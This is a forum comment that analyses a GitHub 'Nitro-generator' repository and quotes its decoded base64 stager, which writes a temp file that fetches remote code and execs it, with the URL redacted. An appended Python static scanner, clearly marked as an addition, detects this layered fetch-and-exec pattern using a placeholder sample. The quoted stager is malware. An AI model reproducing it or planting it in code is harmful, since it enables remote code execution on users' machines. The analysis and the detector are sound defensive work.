phcreery | 3 years ago
Going through the commit log, the author removed the allegedly " 'pyshftuler', a malicious package" [1] 10 days ago. Then changed the repo's purpose 21h ago [2]. And then, injected its own malice? Currently, the base64 code on line 1 of main.py reads
WARNING: DO NOT CLICK THE LINK IN THIS CODE SECTION, I CANNOT CONFIRM THE SITE NOR ITS INTENTION. I HAVE REMOVED IT FOR SAFETY
```
from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('http://[REDACTED]:80/inject/UU7X9zT79b6aHuvL').read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass
```
[1] https://github.com/420World69/Nitro-generator/commit/5df9bba...
[2] https://github.com/420World69/Nitro-generator/commit/b9255f8...
[3] https://github.com/420World69/Nitro-generator/commit/69e9352...
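A static check for the layering described in the comment above (a base64 blob that writes a second stage to a temp file, which then fetches and `exec`s remote code), added here as an example that is not part of the comment or the repository. It only parses source with `ast` and never runs it; `scan`, `SAMPLE`, the `exec(base64.b64decode(...))` wrapper and the `example.invalid` URL are assumptions constructed for the demo.

```python
import ast
import base64

RISKY = {"urllib.request.urlopen": "remote fetch", "os.system": "shell command"}

def _literals(tree):
    """Yield each str/bytes literal as text, plus its base64-decoded form when valid."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
            raw = node.value
            yield raw.decode("utf-8", "replace") if isinstance(raw, bytes) else raw
            try:
                yield base64.b64decode(raw, validate=True).decode("utf-8")
            except ValueError:  # not base64, or the decoded bytes are not text
                pass

def scan(text, depth=0, max_depth=4):
    """Return {(layer_depth, finding)} for text and any code nested in its literals."""
    try:
        tree = ast.parse(text)
    except (SyntaxError, ValueError):
        return set()
    # Map 'from X import Y as Z' so renamed imports (e.g. _uurlopen) still resolve.
    alias = {a.asname or a.name: f"{n.module}.{a.name}"
             for n in ast.walk(tree) if isinstance(n, ast.ImportFrom) for a in n.names}
    calls = lambda root: [alias.get(c.func.id, c.func.id) for c in ast.walk(root)
                          if isinstance(c, ast.Call) and isinstance(c.func, ast.Name)]
    found = {(depth, RISKY[name]) for name in calls(tree) if name in RISKY}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and getattr(node.func, "id", "") in ("exec", "eval"):
            remote = "urllib.request.urlopen" in calls(node)
            found.add((depth, "exec of remote content" if remote else "dynamic exec"))
    if depth < max_depth:
        for hidden in _literals(tree):
            found |= scan(hidden, depth + 1, max_depth)
    return found

# Constructed sample: same layering as the quoted stager, placeholder URL, never executed.
_INNER = "from urllib.request import urlopen as _uurlopen;exec(_uurlopen('http://example.invalid/x').read())"
_STAGE = ("from tempfile import NamedTemporaryFile as _ffile\n"
          "from os import system as _ssystem\n"
          f"_ttmp = _ffile(delete=False)\n_ttmp.write(b\"\"\"{_INNER}\"\"\")\n"
          "_ssystem('start pythonw ' + _ttmp.name)\n")
SAMPLE = f"import base64\nexec(base64.b64decode({base64.b64encode(_STAGE.encode())!r}))\n"

if __name__ == "__main__":
    for layer, finding in sorted(scan(SAMPLE)):
        print(f"layer {layer}: {finding}")
```

The layer number shows how deep a finding was hidden: layer 0 is the file as committed, layer 1 the decoded blob, layer 2 the bytes literal written to the temp file.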